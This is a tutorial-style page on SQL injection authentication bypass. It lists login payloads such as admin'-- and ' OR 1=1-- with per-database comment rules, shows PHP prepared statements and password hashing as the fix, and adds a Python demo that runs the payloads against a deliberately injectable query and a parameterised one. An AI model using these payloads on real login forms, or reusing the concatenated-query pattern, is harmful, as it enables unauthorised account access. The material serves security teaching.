Authentication Bypass

This method relies on the fact that the web application does not care about the actual content of the username and password; it only checks whether the pair matches some row in the users table. If the injected input makes the query match any row, the login succeeds.

  • We assume the application authenticates with a basic query built by string concatenation

SELECT * from users WHERE username='%user%' and password='%password%' LIMIT 1;

%user% and %password% are the values received from the login form, inserted into the query without escaping or parameterisation


  • We can inject into the login fields; which field the payload goes in matters

admin'--   #Username field: closes the string and comments out the rest of the WHERE clause, so the password check never runs
' OR 1=1;--   #Password field: makes the WHERE clause true for every row
'+OR+1=1-- #Same payload, URL-encoded (+ decodes to a space)
#Either way the password verification is skipped; OR 1=1 matches all users, and LIMIT 1 (if it survives) returns the first row, frequently the admin account

Sometimes an extra space after -- is required: MySQL only treats -- as a comment when it is followed by whitespace, so send ' OR 1=1;--  (trailing space, or %20 when URL-encoded)


  • On MySQL back ends (the usual pairing with PHP), the # comment character works as well and needs no trailing space; place it in the username field

admin'#      //Comments out the rest of the query, including the password check; # is not a comment in PostgreSQL, SQLite or MSSQL, so use -- there

Mitigation

It's correct to use prepared statements: they force the database to treat user input as data, not executable code, so these payloads become harmless string values that simply match no username. For example:

Example PHP implementation
// Look the user up by username only; the password is checked in application
// code against a stored hash (see below), never compared inside the SQL.
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? LIMIT 1");
$stmt->execute([$username]);
$user = $stmt->fetch();
if ($user && password_verify($password, $user['password_hash'])) {
    // authenticated
}

Also, we should never store passwords in plaintext and compare them inside the query. Store password hashes produced by algorithms like bcrypt or argon2 and verify them server-side, e.g. with PHP's password_hash() and password_verify().
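The following is an added example, not part of the original page, that runs the bypass payloads from the list above against the page's query and then against the parameterised, hash-verifying login from the mitigation section. It uses SQLite as a stand-in for MySQL (so the MySQL-only # comment is expected to fail, which shows why payloads are dialect-dependent) and the standard-library scrypt in place of bcrypt/argon2; the users table, the sample accounts and all function names are constructed for the demo.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample accounts for the demo; not taken from any real system.
SAMPLE_USERS = [("admin", "s3cret"), ("alice", "hunter2")]


def hash_password(password, salt=None):
    """Salted scrypt hash (stdlib stand-in for bcrypt/argon2), stored as salt:digest in hex."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt.hex() + ":" + digest.hex()


def verify_password(password, stored):
    """Recompute the hash with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split(":")
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), n=2**14, r=8, p=1)
    return hmac.compare_digest(digest.hex(), digest_hex)


def make_db():
    """In-memory users table: a plaintext column for the vulnerable login,
    a hash column for the fixed one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users (username, password, password_hash) VALUES (?, ?, ?)",
                     [(u, p, hash_password(p)) for u, p in SAMPLE_USERS])
    return conn


def login_vulnerable(conn, username, password):
    """The page's query with the form values pasted straight into the SQL string.
    Returns the matched username, or None on no match / SQL error."""
    query = (f"SELECT username FROM users WHERE username='{username}' "
             f"AND password='{password}' LIMIT 1")
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        # Payload did not parse in this dialect (e.g. MySQL-only '#' comment in SQLite)
        return None
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised lookup by username only; the password is checked against the
    stored hash in application code, never inside the SQL."""
    row = conn.execute("SELECT username, password_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None or not verify_password(password, row[1]):
        return None
    return row[0]


def run_payloads():
    """Run the page's payloads through both logins; keys name the case, values are the user logged in as."""
    conn = make_db()
    return {
        "vuln_valid":        login_vulnerable(conn, "admin", "s3cret"),
        "vuln_wrong_pw":     login_vulnerable(conn, "admin", "wrong"),
        "vuln_or_1_1_pw":    login_vulnerable(conn, "nobody", "' OR 1=1-- "),   # password field
        "vuln_comment_user": login_vulnerable(conn, "admin'-- ", "wrong"),      # username field
        "vuln_hash_comment": login_vulnerable(conn, "admin'#", "wrong"),        # MySQL-only, fails here
        "safe_valid":        login_safe(conn, "admin", "s3cret"),
        "safe_or_1_1_pw":    login_safe(conn, "nobody", "' OR 1=1-- "),
        "safe_comment_user": login_safe(conn, "admin'-- ", "wrong"),
    }


if __name__ == "__main__":
    for case, user in run_payloads().items():
        print(f"{case:20s} -> {user}")
```

With the vulnerable login, ' OR 1=1--  in the password field and admin'--  in the username field both return the first row (admin) without a valid password, while admin'# is rejected only because SQLite does not treat # as a comment. The parameterised login returns None for every payload: the quote and comment characters are bound as literal data and match no username, and even a matching username still has to pass the hash check.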
